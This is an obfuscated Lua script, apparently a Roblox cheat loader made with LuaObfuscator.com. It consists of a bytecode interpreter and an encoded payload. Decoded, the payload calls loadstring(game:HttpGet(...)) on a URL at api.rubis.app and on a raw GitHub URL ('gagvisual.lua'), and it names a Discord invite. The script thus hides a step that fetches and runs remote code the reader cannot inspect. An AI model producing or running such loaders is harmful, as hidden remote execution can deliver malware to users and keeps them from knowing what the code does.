--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v87=v2(v0(v30,16));if v19 then local v118=0;local v119;while true do if (v118==1) then return v119;end if (v118==0) then v119=v5(v87,v19);v19=nil;v118=1;end end else return v87;end end end);local function v20(v31,v32,v33) if v33 then local v88=0 + 0 ;local v89;while true do if (v88==((1270 -(226 + 1044)) -0)) then v89=(v31/((1 + 1)^(v32-((8 -6) -1))))%((879 -(282 + 595))^(((v33-(1 -0)) -(v32-1)) + (2 -1))) ;return v89-(v89%(1 -0)) ;end end else local v90=(621 -(555 + 64))^(v32-(932 -(857 + 74))) ;return (((v31%(v90 + v90))>=v90) and (569 -(367 + 201))) or (927 -(214 + 713)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 + 2 + 0 ;return (v36 * (57 + 199)) + v35 ;end local function v23() local v37=957 -(892 + 65) ;local v38;local v39;local v40;local v41;while true do if (v37==(2 -1)) then return (v41 * ((22807558 + 8204054) -14234396)) + (v40 * (120312 -54776)) + (v39 * (606 -(87 + 263))) + v38 ;end if (v37==0) then v38,v39,v40,v41=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + 3 + 1 ;v37=2 -1 ;end end end local function v24() local v42=0;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(3 -(8 -6))) then v45=953 -(802 + 150) ;v46=(v20(v44,2 -1 ,36 -(10 + 6) ) * ((2 + 0)^(1029 -(915 + 82)))) + v43 ;v42=2;end if (v42==(5 -3)) then v47=v20(v44,13 + 8 ,40 -9 );v48=((v20(v44,1219 -(1069 + 118) )==(2 -1)) and  -(1 -0)) or (1 + 0) ;v42=4 -1 ;end if (v42==0) then v43=v23();v44=v23();v42=1 + 0 ;end if (v42==(794 -(368 + 423))) then if (v47==(0 -0)) then if (v46==(18 -(10 + 8))) then return v48 * (0 -(0 -0)) ;else local v129=442 -((1477 -1061) + (885 -(814 + 45))) ;while true do if (v129==(0 -(0 -0))) then v47=1 + 0 ;v45=(0 + 0) -0 ;break;end end end elseif (v47==(2485 -(145 + 293))) then return ((v46==(430 -(16 + 28 + 386))) and (v48 * ((1487 -(998 + 488))/(0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-(838 + 185) ) * (v45 + (v46/((774 -(201 + 571))^(1190 -(116 + 1022))))) ;end end end local function v25(v49) local v50;if  not v49 then local v91=885 -(261 + (2954 -2330)) ;while true do if (v91==(0 -0)) then v49=v23();if (v49==(1080 -(1020 + 60))) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(1424 -(630 + 313 + 480)) );v18=v18 + v49 ;local v51={};for v68=3 -2 , #v50 do v51[v68]=v2(v1(v3(v50,v68,v68)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99) local v92=(function() return 0 -0 ;end)();local v93=(function() return;end)();local v95=(function() return;end)();while true do if (v92~=(341 -(218 + 123))) then else local v124=(function() return 0;end)();local v125=(function() return;end)();while true do if (v124==(1767 -(308 + 1459))) then v125=(function() return 0 -0 ;end)();while true do if (v125==(0 -0)) then v93=(function() return v94();end)();v95=(function() return nil;end)();v125=(function() return 3 -2 ;end)();end if ((1 + 0)~=v125) then else v92=(function() return  #"{";end)();break;end end break;end end end if (v92~= #"]") then else if (v93== #",") then v95=(function() return v94()~=(0 + 0) ;end)();elseif (v93==(869 -(550 + 317))) then v95=(function() return v96();end)();elseif (v93== #"xnx") then v95=(function() return v97();end)();end v98[v99]=(function() return v95;end)();break;end end return v92,v93,v94,v95,v96,v97,v98,v99;end;end)();local v53=(function() return function(v100,v101,v102,v103,v104,v105,v106,v107,v108) local v109=(function() return 0 -0 ;end)();local v100=(function() return;end)();local v101=(function() return;end)();while true do local v117=(function() return 0 -0 ;end)();while true do if (v117~=(560 -(306 + 254))) then else if (v109==1) then local v130=(function() return 0 -0 ;end)();while true do if (v130==(285 -(134 + 151))) then while true do if (v100==(1665 -(970 + 695))) then v101=(function() return v102();end)();if (v103(v101, #"/", #"}")==(0 + 0)) then local v178=(function() return 0 -0 ;end)();local v179=(function() return;end)();local v180=(function() return;end)();local v181=(function() return;end)();while true do if (v178~=2) then else if (v103(v180, #"]", #"}")~= #"/") then else v181[3 -1 ]=(function() return v106[v181[605 -(268 + 335) ]];end)();end if (v103(v180,292 -(60 + 230) ,1992 -(582 + 1408) )~= #"[") then else v181[ #"xnx"]=(function() return v106[v181[ #"-19"]];end)();end v178=(function() return 575 -(426 + 146) ;end)();end if (v178~=(3 -2)) then else local v219=(function() return 0 -0 ;end)();while true do if (v219~=(3 -2)) then else v178=(function() return 813 -(569 + 242) ;end)();break;end if (v219~=0) then else v181=(function() return {v104(),v104(),nil,nil};end)();if (v179==(1824 -(1195 + 629))) then local v226=(function() return 1024 -(706 + 318) ;end)();local v227=(function() return;end)();while true do if (v226~=0) then else v227=(function() return 1251 -(721 + 530) ;end)();while true do if (v227==(0 -0)) then v181[ #"xxx"]=(function() return v104();end)();v181[ #"0313"]=(function() return v104();end)();break;end end break;end end elseif (v179== #",") then v181[ #"91("]=(function() return v105();end)();elseif (v179==(1273 -(945 + 326))) then v181[ #"-19"]=(function() return v105() -((243 -(187 + 54))^(39 -23)) ;end)();elseif (v179~= #"91(") then else local v232=(function() return 780 -(162 + 618) ;end)();local v233=(function() return;end)();while true do if (v232==(0 + 0)) then v233=(function() return 0 + 0 ;end)();while true do if (v233~=0) then else v181[ #"xnx"]=(function() return v105() -((2 + 0)^(33 -17)) ;end)();v181[ #"?id="]=(function() return v104();end)();break;end end break;end end end v219=(function() return 1;end)();end end end if ((0 -0)==v178) then local v220=(function() return 0;end)();local v221=(function() return;end)();while true do if (v220~=(1086 -(461 + 625))) then else v221=(function() return 0;end)();while true do if (v221==(1289 -(993 + 295))) then v178=(function() return 1 + 0 ;end)();break;end if (0==v221) then v179=(function() return v103(v101,1 + 1 , #"xxx");end)();v180=(function() return v103(v101, #".com",1642 -(1373 + 263) );end)();v221=(function() return 1 + 0 ;end)();end end break;end end end if (v178==(1 + 2)) then if (v103(v180, #"xxx", #"gha")~= #":") then else v181[ #"xnxx"]=(function() return v106[v181[ #"http"]];end)();end v107[v108]=(function() return v181;end)();break;end end end break;end end return v100,v101,v102,v103,v104,v105,v106,v107,v108;end end end if (v109~=0) then else v100=(function() return 0 + 0 ;end)();v101=(function() return nil;end)();v109=(function() return 1;end)();end break;end end end end;end)();local v54=(function() return function(v110,v111,v112) local v113=(function() return 0 + 0 ;end)();local v114=(function() return;end)();while true do if ((1000 -(451 + 549))==v113) then v114=(function() return 0;end)();while true do if (v114==(1769 -(1749 + 20))) then local v131=(function() return 0 + 0 ;end)();local v132=(function() return;end)();while true do if (v131==(0 + 0)) then v132=(function() return 0 -0 ;end)();while true do if ((0 -0)~=v132) then else local v173=(function() return 1384 -(746 + 638) ;end)();while true do if (v173==(0 + 0)) then v110[v111-#"]" ]=(function() return v112();end)();return v110,v111,v112;end end end end break;end end end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v70= #",",v59 do FlatIdent_C460,Type,v21,Cons,v24,v25,v60,v70=(function() return v52(FlatIdent_C460,Type,v21,Cons,v24,v25,v60,v70);end)();end v58[ #"nil"]=(function() return v21();end)();for v71= #"}",v23() do FlatIdent_7F35E,Descriptor,v21,v20,v22,v23,v60,v55,v71=(function() return v53(FlatIdent_7F35E,Descriptor,v21,v20,v22,v23,v60,v55,v71);end)();end for v72= #">",v23() do v56,v72,v28=(function() return v54(v56,v72,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[1146 -(466 + 679) ];local v66=v62[4 -2 ];local v67=v62[8 -5 ];return function(...) local v73=v65;local v74=v66;local v75=v67;local v76=v27;local v77=1901 -(106 + 1794) ;local v78= -(1 + 0);local v79={};local v80={...};local v81=v12("#",...) -(2 -1) ;local v82={};local v83={};for v115=1125 -(936 + 189) ,v81 do if ((1473<=4013) and (v115>=v75)) then v79[v115-v75 ]=v80[v115 + 1 + 0 ];else v83[v115]=v80[v115 + (2 -1) ];end end local v84=(v81-v75) + 1 ;local v85;local v86;while true do local v116=114 -(4 + (355 -245)) ;while true do if (v116==(1138 -(782 + (2095 -(404 + 1335))))) then v85=v73[v77];v86=v85[1];v116=585 -(57 + 527) ;end if (v116==(1428 -(41 + 1386))) then if (v86<=(109 -((423 -(183 + 223)) + (104 -18)))) then if ((422<=1157) and (v86<=(2 + 0))) then if ((v86<=(0 -(0 + 0))) or (604>978)) then local v133=v85[1094 -(351 + 624 + 117) ];local v134=v83[v85[8 -5 ]];v83[v133 + (167 -(122 + 44)) ]=v134;v83[v133]=v134[v85[6 -2 ]];elseif (v86==(3 -2)) then v83[v85[2 + (337 -(10 + 327)) ]]=v85[1021 -(697 + 321) ]~=(0 + 0) ;else local v141=v85[(3 + 0) -1 ];v83[v141]=v83[v141](v13(v83,v141 + (2 -1) ,v78));end elseif (v86<=(2 + 2)) then if (v86>((406 -(118 + 220)) -(30 + 35))) then local v143;local v144,v145;local v146;v83[v85[1 + 1 + 0 ]]=v85[1260 -(1043 + 214) ]~=(0 -0) ;v77=v77 + (2 -1) ;v85=v73[v77];v146=v85[1229 -(322 + 905) ];v144,v145=v76(v83[v146](v13(v83,v146 + (612 -(602 + (458 -(108 + 341)))) ,v85[1192 -(449 + 740) ])));v78=(v145 + v146) -(1213 -(323 + 400 + 489)) ;v143=0 -0 ;for v174=v146,v78 do v143=v143 + (581 -((1526 -1165) + 219)) ;v83[v174]=v144[v143];end v77=v77 + 1 + 0 ;v85=v73[v77];v146=v85[322 -(53 + 267) ];v83[v146]=v83[v146](v13(v83,v146 + (1494 -(711 + 782)) + 0 ,v78));v77=v77 + (3 -2) ;v85=v73[v77];v83[v85[2 + (0 -0) ]]=v85[416 -(15 + 398) ];v77=v77 + (983 -(18 + 964)) ;v85=v73[v77];v146=v85[7 -5 ];v83[v146](v83[v146 + 1 + 0 ]);v77=v77 + 1 + 0 ;v85=v73[v77];v77=v85[(1322 -(270 + 199)) -(20 + 830) ];else local v156=v85[2 + 0 + 0 ];v83[v156](v83[v156 + (127 -(116 + (1829 -(580 + 1239)))) ]);end elseif (v86>(1 + 4)) then v83[v85[740 -(542 + 196) ]]=v64[v85[6 -3 ]];else v77=v85[1 + 2 ];end elseif (v86<=(5 + 4)) then if ((v86<=7) or (4484==900)) then for v138=v85[1 + 1 ],v85[(20 -13) -4 ] do v83[v138]=nil;end elseif ((v86==(20 -12)) or (4459<=1113)) then if (v83[v85[1553 -(1126 + 425) ]]==v85[(392 + 17) -(118 + 287) ]) then v77=v77 + (2 -1) ;else v77=v85[11 -8 ];end else do return;end end elseif ((3632>3398) and (v86<=(1132 -(118 + 1003)))) then if (v86==(29 -19)) then v83[v85[2]]();else v83[v85[379 -(142 + 9 + 226) ]]=v85[(6 + 7) -10 ];end elseif (v86>(30 -18)) then local v162=0 -0 ;local v163;local v164;local v165;local v166;while true do if (v162==(0 + 0)) then v163=v85[979 -((1443 -890) + 424) ];v164,v165=v76(v83[v163](v13(v83,v163 + (1 -0) ,v85[3 + 0 ])));v162=1 + 0 ;end if ((4082<=4917) and (v162==(1 + 0))) then v78=(v165 + v163) -(1 + 0) ;v166=0 + 0 ;v162=4 -2 ;end if (v162==(5 -3)) then for v213=v163,v78 do v166=v166 + (2 -1) ;v83[v213]=v164[v166];end break;end end else local v167=0;local v168;local v169;local v170;local v171;local v172;while true do if ((4832>=1386) and (v167==(2 + 2))) then v83[v85[2 -0 ]]=v85[768 -(574 + 191) ]~=(0 + 0 + 0) ;v77=v77 + (4 -3) ;v85=v73[v77];v172=v85[755 -(239 + 514) ];v167=2 + 3 ;end if (v167==(136 -((1222 -(645 + 522)) + 71))) then v171=v83[v85[1332 -(797 + 532) ]];v83[v172 + 1 + 0 ]=v171;v83[v172]=v171[v85[2 + 2 ]];break;end if ((137==137) and (v167==(0 -0))) then v168=nil;v169,v170=nil;v171=nil;v172=nil;v167=1203 -(373 + 829) ;end if ((740 -(476 + 255))==v167) then v83[v85[2]]=v64[v85[1133 -(369 + 761) ]];v77=v77 + ((1791 -(1010 + 780)) -(0 + 0)) ;v85=v73[v77];v172=v85[1 + 1 ];v167=14 -4 ;end if ((v167==((9 -7) + 1)) or (1570>=4332)) then v85=v73[v77];v83[v85[2 -0 ]]=v85[5 -2 ];v77=v77 + (239 -(64 + 174)) ;v85=v73[v77];v167=1 + (8 -5) ;end if ((v167==(2 + 6)) or (4064<=1819)) then v85=v73[v77];v83[v85[(1838 -(1045 + 791)) -0 ]]=v64[v85[10 -7 ]];v77=v77 + (337 -(144 + 192)) ;v85=v73[v77];v167=741 -(16 + 716) ;end if ((v167==(222 -(42 + 174))) or (4986<1574)) then v77=v77 + 1 + 0 ;v85=v73[v77];v172=v85[2 + 0 ];v83[v172]=v83[v172](v13(v83,v172 + 1 + 0 ,v78));v167=1511 -(363 + 1141) ;end if (v167==((4001 -2420) -((1806 -623) + (902 -(351 + 154))))) then v83[v85[5 -3 ]]=v64[v85[3 + 0 ]];v77=v77 + 1 + 0 ;v85=v73[v77];v172=v85[1977 -(1913 + 62) ];v167=(1576 -(1281 + 293)) + 0 ;end if ((4426>172) and ((18 -(277 -(28 + 238)))==v167)) then v77=v77 + (1934 -(565 + 1368)) ;v85=v73[v77];v83[v85[2 + 0 ]]();v77=v77 + 1 + 0 ;v167=30 -22 ;end if (v167==(1666 -((3300 -1823) + 184))) then v169,v170=v76(v83[v172](v13(v83,v172 + (1 -0) ,v85[736 -(711 + 22) ])));v78=(v170 + v172) -((1562 -(1381 + 178)) -2) ;v168=859 -(240 + 619) ;for v216=v172,v78 do v168=v168 + 1 + 0 ;v83[v216]=v169[v168];end v167=6 + 0 ;end if (v167==(858 -(564 + 292))) then v171=v83[v85[1 + 2 ]];v83[v172 + (1 -0) ]=v171;v83[v172]=v171[v85[(11 + 0) -7 ]];v77=v77 + (305 -(244 + 60)) ;v167=2 + 1 + 0 ;end end end v77=v77 + (4 -3) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!073Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403333Q00682Q7470733A2Q2F6170692E72756269732E612Q702F76322F73637261702F416E4D495061715462737943625A52342F72617703503Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F663473686E2F6D61696E2F726566732F68656164732F6D61696E2F67616D65732F67616776697375616C2E6C756103153Q00646973636F72642E2Q672F63737875326E436B7739001D3Q00120B3Q00014Q0007000100013Q0026083Q0002000100010004053Q0002000100120B000100013Q00260800010005000100010004053Q00050001001206000200023Q00120C000300033Q00202Q00030003000400122Q000500056Q000600016Q000300066Q00023Q00024Q00020001000100122Q000200023Q00122Q000300033Q00202Q00030003000400120B000500064Q0004000600016Q000300066Q00023Q000200122Q000300076Q00020002000100044Q001C00010004053Q000500010004053Q001C00010004053Q000200012Q00093Q00017Q00",v9(),...);
